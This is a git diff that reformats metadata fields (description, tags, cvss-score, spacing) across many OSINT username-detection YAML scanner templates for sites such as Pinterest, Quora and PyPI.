CWE-200 - tags: osint,osint-finance,paypal metadata: max-request: 1 + tags: osint,osint-finance,paypal self-contained: true + http: - method: GET path: diff --git a/http/osint/pcgamer.yaml b/http/osint/pcgamer.yaml index ce96bdca63..3c512842b9 100644 --- a/http/osint/pcgamer.yaml +++ b/http/osint/pcgamer.yaml @@ -3,17 +3,18 @@ id: pcgamer info: name: PCGamer User Name Information - Detect author: dwisiswant0 - description: PCGamer user name information check was conducted. severity: info + description: PCGamer user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,pcgamer metadata: max-request: 1 + tags: osint,osint-gaming,pcgamer self-contained: true + http: - method: GET path: diff --git a/http/osint/pcpartpicker.yaml b/http/osint/pcpartpicker.yaml index c987a50669..43aab5daf7 100644 --- a/http/osint/pcpartpicker.yaml +++ b/http/osint/pcpartpicker.yaml @@ -3,17 +3,18 @@ id: pcpartpicker info: name: PCPartPicker User Name Information - Detect author: dwisiswant0 - description: PCPartPicker user name information check was conducted. severity: info + description: PCPartPicker user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,pcpartpicker metadata: max-request: 1 + tags: osint,osint-tech,pcpartpicker self-contained: true + http: - method: GET path: diff --git a/http/osint/peing.yaml b/http/osint/peing.yaml index 89c3c123d9..1f9f262c87 100644 --- a/http/osint/peing.yaml +++ b/http/osint/peing.yaml @@ -3,17 +3,18 @@ id: peing info: name: Peing User Name Information - Detect author: dwisiswant0 - description: Peing user name information check was conducted. severity: info + description: Peing user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,peing metadata: max-request: 1 + tags: osint,osint-social,peing self-contained: true + http: - method: GET path: diff --git a/http/osint/periscope.yaml b/http/osint/periscope.yaml index 7c281d5934..73f7354e4d 100644 --- a/http/osint/periscope.yaml +++ b/http/osint/periscope.yaml @@ -3,17 +3,18 @@ id: periscope info: name: Periscope User Name Information - Detect author: dwisiswant0 - description: Periscope user name information check was conducted. severity: info + description: Periscope user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-video,periscope metadata: max-request: 1 + tags: osint,osint-video,periscope self-contained: true + http: - method: GET path: diff --git a/http/osint/pettingzooco-mastodon-instance.yaml b/http/osint/pettingzooco-mastodon-instance.yaml index 89826d087b..1dbc9024f7 100644 --- a/http/osint/pettingzooco-mastodon-instance.yaml +++ b/http/osint/pettingzooco-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: pettingzooco-mastodon-instance info: name: Pettingzoo.co (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Pettingzoo.co (Mastodon Instance) user name information check was conducted. severity: info + description: Pettingzoo.co (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pettingzooco-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,pettingzooco-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/pewex.yaml b/http/osint/pewex.yaml index bf5cb03389..78355a5f90 100644 --- a/http/osint/pewex.yaml +++ b/http/osint/pewex.yaml @@ -3,17 +3,18 @@ id: pewex info: name: Pewex User Name Information - Detect author: dwisiswant0 - description: Pewex user name information check was conducted. severity: info + description: Pewex user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,pewex metadata: max-request: 1 + tags: osint,osint-misc,pewex self-contained: true + http: - method: GET path: diff --git a/http/osint/picsart.yaml b/http/osint/picsart.yaml index c718a02674..2559f1d31a 100644 --- a/http/osint/picsart.yaml +++ b/http/osint/picsart.yaml @@ -3,17 +3,18 @@ id: picsart info: name: Picsart User Name Information - Detect author: dwisiswant0 - description: Picsart user name information check was conducted. severity: info + description: Picsart user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,picsart metadata: max-request: 1 + tags: osint,osint-art,picsart self-contained: true + http: - method: GET path: diff --git a/http/osint/piekielni.yaml b/http/osint/piekielni.yaml index ea2214beb9..b0d0fd04d7 100644 --- a/http/osint/piekielni.yaml +++ b/http/osint/piekielni.yaml @@ -3,17 +3,18 @@ id: piekielni info: name: Piekielni User Name Information - Detect author: dwisiswant0 - description: Piekielni user name information check was conducted. severity: info + description: Piekielni user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,piekielni metadata: max-request: 1 + tags: osint,osint-misc,piekielni self-contained: true + http: - method: GET path: diff --git a/http/osint/pikabu.yaml b/http/osint/pikabu.yaml index 7e0436f0be..b03f2ac819 100644 --- a/http/osint/pikabu.yaml +++ b/http/osint/pikabu.yaml @@ -3,17 +3,18 @@ id: pikabu info: name: Pikabu User Name Information - Detect author: dwisiswant0 - description: Pikabu user name information check was conducted. severity: info + description: Pikabu user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pikabu metadata: max-request: 1 + tags: osint,osint-social,pikabu self-contained: true + http: - method: GET path: diff --git a/http/osint/pillowfort.yaml b/http/osint/pillowfort.yaml index 6568796509..c77083b7e4 100644 --- a/http/osint/pillowfort.yaml +++ b/http/osint/pillowfort.yaml @@ -3,17 +3,18 @@ id: pillowfort info: name: Pillowfort User Name Information - Detect author: dwisiswant0 - description: Pillowfort user name information check was conducted. severity: info + description: Pillowfort user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pillowfort metadata: max-request: 1 + tags: osint,osint-social,pillowfort self-contained: true + http: - method: GET path: diff --git a/http/osint/pinkbike.yaml b/http/osint/pinkbike.yaml index 7eaec35447..73abd3a4f1 100644 --- a/http/osint/pinkbike.yaml +++ b/http/osint/pinkbike.yaml @@ -3,17 +3,18 @@ id: pinkbike info: name: PinkBike User Name Information - Detect author: dwisiswant0 - description: PinkBike user name information check was conducted. severity: info + description: PinkBike user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,pinkbike metadata: max-request: 1 + tags: osint,osint-hobby,pinkbike self-contained: true + http: - method: GET path: diff --git a/http/osint/pinterest.yaml b/http/osint/pinterest.yaml index 0ba580834a..6017533f26 100644 --- a/http/osint/pinterest.yaml +++ b/http/osint/pinterest.yaml @@ -3,17 +3,18 @@ id: pinterest info: name: Pinterest User Name Information - Detect author: dwisiswant0 - description: Pinterest user name information check was conducted. severity: info + description: Pinterest user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pinterest metadata: max-request: 1 + tags: osint,osint-social,pinterest self-contained: true + http: - method: GET path: diff --git a/http/osint/pixelfedsocial.yaml b/http/osint/pixelfedsocial.yaml index 1d999f872a..aa00d092dd 100644 --- a/http/osint/pixelfedsocial.yaml +++ b/http/osint/pixelfedsocial.yaml @@ -3,17 +3,18 @@ id: pixelfedsocial info: name: Pixelfed.social User Name Information - Detect author: dwisiswant0 - description: Pixelfed.social user name information check was conducted. severity: info + description: Pixelfed.social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pixelfedsocial metadata: max-request: 1 + tags: osint,osint-social,pixelfedsocial self-contained: true + http: - method: GET path: diff --git a/http/osint/platzi.yaml b/http/osint/platzi.yaml index 8fc0f67e0d..2e4d9e73e4 100644 --- a/http/osint/platzi.yaml +++ b/http/osint/platzi.yaml @@ -7,19 +7,21 @@ info: description: Platzi service user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,platzi metadata: max-request: 1 + tags: osint,osint-social,platzi self-contained: true + http: - method: GET path: - "https://platzi.com/p/{{user}}" redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/osint/playstation-network.yaml b/http/osint/playstation-network.yaml index df66e48fbc..0b3614ff6f 100644 --- a/http/osint/playstation-network.yaml +++ b/http/osint/playstation-network.yaml @@ -3,17 +3,18 @@ id: playstation-network info: name: Playstation Network User Name Information - Detect author: dwisiswant0 - description: Playstation Network user name information check was conducted. severity: info + description: Playstation Network user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,playstation-network metadata: max-request: 1 + tags: osint,osint-gaming,playstation-network self-contained: true + http: - method: GET path: diff --git a/http/osint/plurk.yaml b/http/osint/plurk.yaml index 607235fb7b..4bec515632 100644 --- a/http/osint/plurk.yaml +++ b/http/osint/plurk.yaml @@ -3,17 +3,18 @@ id: plurk info: name: Plurk User Name Information - Detect author: dwisiswant0 - description: Plurk user name information check was conducted. severity: info + description: Plurk user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,plurk metadata: max-request: 1 + tags: osint,osint-social,plurk self-contained: true + http: - method: GET path: diff --git a/http/osint/pokec.yaml b/http/osint/pokec.yaml index 298cc2c9e8..523e56d5b3 100644 --- a/http/osint/pokec.yaml +++ b/http/osint/pokec.yaml @@ -3,17 +3,18 @@ id: pokec info: name: Pokec User Name Information - Detect author: dwisiswant0 - description: Pokec user name information check was conducted. severity: info + description: Pokec user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pokec metadata: max-request: 1 + tags: osint,osint-social,pokec self-contained: true + http: - method: GET path: diff --git a/http/osint/pokemonshowdown.yaml b/http/osint/pokemonshowdown.yaml index 1d7f8ba2c9..16714a5a18 100644 --- a/http/osint/pokemonshowdown.yaml +++ b/http/osint/pokemonshowdown.yaml @@ -3,17 +3,18 @@ id: pokemonshowdown info: name: Pokemonshowdown User Name Information - Detect author: dwisiswant0 - description: Pokemonshowdown user name information check was conducted. severity: info + description: Pokemonshowdown user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,pokemonshowdown metadata: max-request: 1 + tags: osint,osint-gaming,pokemonshowdown self-contained: true + http: - method: GET path: diff --git a/http/osint/pokerstrategy.yaml b/http/osint/pokerstrategy.yaml index 8a827f0507..616c815f6e 100644 --- a/http/osint/pokerstrategy.yaml +++ b/http/osint/pokerstrategy.yaml @@ -3,17 +3,18 @@ id: pokerstrategy info: name: Pokerstrategy User Name Information - Detect author: dwisiswant0 - description: Pokerstrategy user name information check was conducted. severity: info + description: Pokerstrategy user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,pokerstrategy metadata: max-request: 1 + tags: osint,osint-gaming,pokerstrategy self-contained: true + http: - method: GET path: diff --git a/http/osint/polchatpl.yaml b/http/osint/polchatpl.yaml index 474ef75037..bde2d26fef 100644 --- a/http/osint/polchatpl.yaml +++ b/http/osint/polchatpl.yaml @@ -3,17 +3,18 @@ id: polchatpl info: name: Polchat.pl User Name Information - Detect author: dwisiswant0 - description: Polchat.pl user name information check was conducted. severity: info + description: Polchat.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,polchatpl metadata: max-request: 1 + tags: osint,osint-social,polchatpl self-contained: true + http: - method: GET path: diff --git a/http/osint/policja2009.yaml b/http/osint/policja2009.yaml index 290cf6d34a..499d6a27c2 100644 --- a/http/osint/policja2009.yaml +++ b/http/osint/policja2009.yaml @@ -3,17 +3,18 @@ id: policja2009 info: name: Policja2009 User Name Information - Detect author: dwisiswant0 - description: Policja2009 user name information check was conducted. severity: info + description: Policja2009 user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,policja2009 metadata: max-request: 1 + tags: osint,osint-misc,policja2009 self-contained: true + http: - method: GET path: diff --git a/http/osint/poll-everywhere.yaml b/http/osint/poll-everywhere.yaml index 19e0b07233..7c6876b43f 100644 --- a/http/osint/poll-everywhere.yaml +++ b/http/osint/poll-everywhere.yaml @@ -3,17 +3,18 @@ id: poll-everywhere info: name: Poll Everywhere User Name Information - Detect author: dwisiswant0 - description: Poll Everywhere user name information check was conducted. severity: info + description: Poll Everywhere user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,poll-everywhere metadata: max-request: 1 + tags: osint,osint-tech,poll-everywhere self-contained: true + http: - method: GET path: diff --git a/http/osint/polygon.yaml b/http/osint/polygon.yaml index 75f3eb0bbf..26a59850fb 100644 --- a/http/osint/polygon.yaml +++ b/http/osint/polygon.yaml @@ -3,17 +3,18 @@ id: polygon info: name: Polygon User Name Information - Detect author: dwisiswant0 - description: Polygon user name information check was conducted. severity: info + description: Polygon user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,polygon metadata: max-request: 1 + tags: osint,osint-gaming,polygon self-contained: true + http: - method: GET path: diff --git a/http/osint/polywork.yaml b/http/osint/polywork.yaml index 9f716cbd8e..85f6e3267b 100644 --- a/http/osint/polywork.yaml +++ b/http/osint/polywork.yaml @@ -7,13 +7,14 @@ info: description: Polywork user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,polywork metadata: max-request: 1 + tags: osint,osint-social,polywork self-contained: true + http: - method: GET path: @@ -21,6 +22,7 @@ http: redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/osint/popl.yaml b/http/osint/popl.yaml index 8c99e381f3..ae26666cd3 100644 --- a/http/osint/popl.yaml +++ b/http/osint/popl.yaml @@ -3,17 +3,18 @@ id: popl info: name: Popl User Name Information - Detect author: dwisiswant0 - description: Popl user name information check was conducted. severity: info + description: Popl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,popl metadata: max-request: 1 + tags: osint,osint-business,popl self-contained: true + http: - method: GET path: diff --git a/http/osint/pornhub-porn-stars.yaml b/http/osint/pornhub-porn-stars.yaml index b24668d699..988f02f2c3 100644 --- a/http/osint/pornhub-porn-stars.yaml +++ b/http/osint/pornhub-porn-stars.yaml @@ -3,17 +3,18 @@ id: pornhub-porn-stars info: name: Pornhub Porn Stars User Name Information - Detect author: dwisiswant0 - description: Pornhub Porn Stars user name information check was conducted. severity: info + description: Pornhub Porn Stars user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,pornhub-porn-stars metadata: max-request: 1 + tags: osint,osint-porn,pornhub-porn-stars self-contained: true + http: - method: GET path: diff --git a/http/osint/pornhub-users.yaml b/http/osint/pornhub-users.yaml index 4a0c82fb42..89ec8b3066 100644 --- a/http/osint/pornhub-users.yaml +++ b/http/osint/pornhub-users.yaml @@ -3,17 +3,18 @@ id: pornhub-users info: name: Pornhub Users User Name Information - Detect author: dwisiswant0 - description: Pornhub Users user name information check was conducted. severity: info + description: Pornhub Users user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,pornhub-users metadata: max-request: 1 + tags: osint,osint-porn,pornhub-users self-contained: true + http: - method: GET path: diff --git a/http/osint/poshmark.yaml b/http/osint/poshmark.yaml index 0e2bb9d79e..3aa86b5de7 100644 --- a/http/osint/poshmark.yaml +++ b/http/osint/poshmark.yaml @@ -3,17 +3,18 @@ id: poshmark info: name: Poshmark User Name Information - Detect author: dwisiswant0 - description: Poshmark user name information check was conducted. severity: info + description: Poshmark user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,poshmark metadata: max-request: 1 + tags: osint,osint-shopping,poshmark self-contained: true + http: - method: GET path: diff --git a/http/osint/postcrossing.yaml b/http/osint/postcrossing.yaml index 546129b162..9f356732ed 100644 --- a/http/osint/postcrossing.yaml +++ b/http/osint/postcrossing.yaml @@ -3,17 +3,18 @@ id: postcrossing info: name: Postcrossing User Name Information - Detect author: dwisiswant0 - description: Postcrossing user name information check was conducted. severity: info + description: Postcrossing user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,postcrossing metadata: max-request: 1 + tags: osint,osint-social,postcrossing self-contained: true + http: - method: GET path: diff --git a/http/osint/postnews.yaml b/http/osint/postnews.yaml index 10c8d512ad..4b85f3d725 100644 --- a/http/osint/postnews.yaml +++ b/http/osint/postnews.yaml @@ -7,13 +7,14 @@ info: description: Postnews user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,postnews metadata: max-request: 1 + tags: osint,osint-social,postnews self-contained: true + http: - method: GET path: diff --git a/http/osint/poweredbygaysocial-mastodon-instance.yaml b/http/osint/poweredbygaysocial-mastodon-instance.yaml index 30d8d0355e..fe63c6d335 100644 --- a/http/osint/poweredbygaysocial-mastodon-instance.yaml +++ b/http/osint/poweredbygaysocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: poweredbygaysocial-mastodon-instance info: name: Poweredbygay.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Poweredbygay.social (Mastodon Instance) user name information check was conducted. severity: info + description: Poweredbygay.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,poweredbygaysocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,poweredbygaysocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/producthunt.yaml b/http/osint/producthunt.yaml index 9e7cbac679..297a5ef901 100644 --- a/http/osint/producthunt.yaml +++ b/http/osint/producthunt.yaml @@ -3,17 +3,18 @@ id: producthunt info: name: Producthunt User Name Information - Detect author: dwisiswant0 - description: Producthunt user name information check was conducted. severity: info + description: Producthunt user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,producthunt metadata: max-request: 1 + tags: osint,osint-business,producthunt self-contained: true + http: - method: GET path: diff --git a/http/osint/promodj.yaml b/http/osint/promodj.yaml index b2e8e7caf7..f5b59591aa 100644 --- a/http/osint/promodj.yaml +++ b/http/osint/promodj.yaml @@ -3,17 +3,18 @@ id: promodj info: name: Promodj User Name Information - Detect author: dwisiswant0 - description: Promodj user name information check was conducted. severity: info + description: Promodj user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,promodj metadata: max-request: 1 + tags: osint,osint-music,promodj self-contained: true + http: - method: GET path: diff --git a/http/osint/pronounspage.yaml b/http/osint/pronounspage.yaml index 0c4969cd85..96d38a0e81 100644 --- a/http/osint/pronounspage.yaml +++ b/http/osint/pronounspage.yaml @@ -3,17 +3,18 @@ id: pronounspage info: name: Pronouns.Page User Name Information - Detect author: dwisiswant0 - description: Pronouns.Page user name information check was conducted. severity: info + description: Pronouns.Page user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pronounspage metadata: max-request: 1 + tags: osint,osint-social,pronounspage self-contained: true + http: - method: GET path: diff --git a/http/osint/pronouny.yaml b/http/osint/pronouny.yaml index 7297d9afd5..0fb77da6cf 100644 --- a/http/osint/pronouny.yaml +++ b/http/osint/pronouny.yaml @@ -3,17 +3,18 @@ id: pronouny info: name: Pronouny User Name Information - Detect author: dwisiswant0 - description: Pronouny user name information check was conducted. severity: info + description: Pronouny user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,pronouny metadata: max-request: 1 + tags: osint,osint-social,pronouny self-contained: true + http: - method: GET path: diff --git a/http/osint/prose.yaml b/http/osint/prose.yaml index d276a1cb93..ee9fc9b001 100644 --- a/http/osint/prose.yaml +++ b/http/osint/prose.yaml @@ -3,17 +3,18 @@ id: prose info: name: Prose User Name Information - Detect author: dwisiswant0 - description: Prose user name information check was conducted. severity: info + description: Prose user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,prose metadata: max-request: 1 + tags: osint,osint-blog,prose self-contained: true + http: - method: GET path: diff --git a/http/osint/prvpl.yaml b/http/osint/prvpl.yaml index 0c3efc5c37..2fc307b293 100644 --- a/http/osint/prvpl.yaml +++ b/http/osint/prvpl.yaml @@ -3,17 +3,18 @@ id: prvpl info: name: Prv.pl User Name Information - Detect author: dwisiswant0 - description: Prv.pl user name information check was conducted. severity: info + description: Prv.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,prvpl metadata: max-request: 1 + tags: osint,osint-tech,prvpl self-contained: true + http: - method: GET path: diff --git a/http/osint/psstaudio.yaml b/http/osint/psstaudio.yaml index 88e3463f57..3f594fed94 100644 --- a/http/osint/psstaudio.yaml +++ b/http/osint/psstaudio.yaml @@ -3,17 +3,18 @@ id: psstaudio info: name: Psstaudio User Name Information - Detect author: dwisiswant0 - description: Psstaudio user name information check was conducted. severity: info + description: Psstaudio user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,psstaudio metadata: max-request: 1 + tags: osint,osint-porn,psstaudio self-contained: true + http: - method: GET path: diff --git a/http/osint/public.yaml b/http/osint/public.yaml index aee19733f0..270462c675 100644 --- a/http/osint/public.yaml +++ b/http/osint/public.yaml @@ -3,17 +3,18 @@ id: public info: name: Public User Name Information - Detect author: dwisiswant0 - description: Public user name information check was conducted. severity: info + description: Public user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,public metadata: max-request: 1 + tags: osint,osint-finance,public self-contained: true + http: - method: GET path: diff --git a/http/osint/pypi.yaml b/http/osint/pypi.yaml index bc86cf0ff6..4c22e51600 100644 --- a/http/osint/pypi.yaml +++ b/http/osint/pypi.yaml @@ -3,17 +3,18 @@ id: pypi info: name: Pypi User Name Information - Detect author: dwisiswant0 - description: Pypi user name information check was conducted. severity: info + description: Pypi user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,pypi metadata: max-request: 1 + tags: osint,osint-coding,pypi self-contained: true + http: - method: GET path: diff --git a/http/osint/queer.yaml b/http/osint/queer.yaml index 6576f908cb..78e22bac7e 100644 --- a/http/osint/queer.yaml +++ b/http/osint/queer.yaml @@ -3,17 +3,18 @@ id: queer info: name: QUEER User Name Information - Detect author: dwisiswant0 - description: QUEER user name information check was conducted. severity: info + description: QUEER user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,queer metadata: max-request: 1 + tags: osint,osint-social,queer self-contained: true + http: - method: GET path: diff --git a/http/osint/quitterpl.yaml b/http/osint/quitterpl.yaml index 460ee4aa3b..c3dce09243 100644 --- a/http/osint/quitterpl.yaml +++ b/http/osint/quitterpl.yaml @@ -3,17 +3,18 @@ id: quitterpl info: name: Quitter.pl User Name Information - Detect author: dwisiswant0 - description: Quitter.pl user name information check was conducted. severity: info + description: Quitter.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,quitterpl metadata: max-request: 1 + tags: osint,osint-social,quitterpl self-contained: true + http: - method: GET path: diff --git a/http/osint/quora.yaml b/http/osint/quora.yaml index 8cf7e913a2..d86e8496ff 100644 --- a/http/osint/quora.yaml +++ b/http/osint/quora.yaml @@ -3,17 +3,18 @@ id: quora info: name: Quora User Name Information - Detect author: dwisiswant0 - description: Quora user name information check was conducted. severity: info + description: Quora user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,quora metadata: max-request: 1 + tags: osint,osint-social,quora self-contained: true + http: - method: GET path: diff --git a/http/osint/raddleme.yaml b/http/osint/raddleme.yaml index 3909b8219c..d91cc6d691 100644 --- a/http/osint/raddleme.yaml +++ b/http/osint/raddleme.yaml @@ -3,17 +3,18 @@ id: raddleme info: name: Raddle.me User Name Information - Detect author: dwisiswant0 - description: Raddle.me user name information check was conducted. severity: info + description: Raddle.me user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,raddleme metadata: max-request: 1 + tags: osint,osint-social,raddleme self-contained: true + http: - method: GET path: diff --git a/http/osint/rantli.yaml b/http/osint/rantli.yaml index 64c7dd16b6..cd0f2d6b6b 100644 --- a/http/osint/rantli.yaml +++ b/http/osint/rantli.yaml @@ -3,17 +3,18 @@ id: rantli info: name: Rant.li User Name Information - Detect author: dwisiswant0 - description: Rant.li user name information check was conducted. severity: info + description: Rant.li user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - 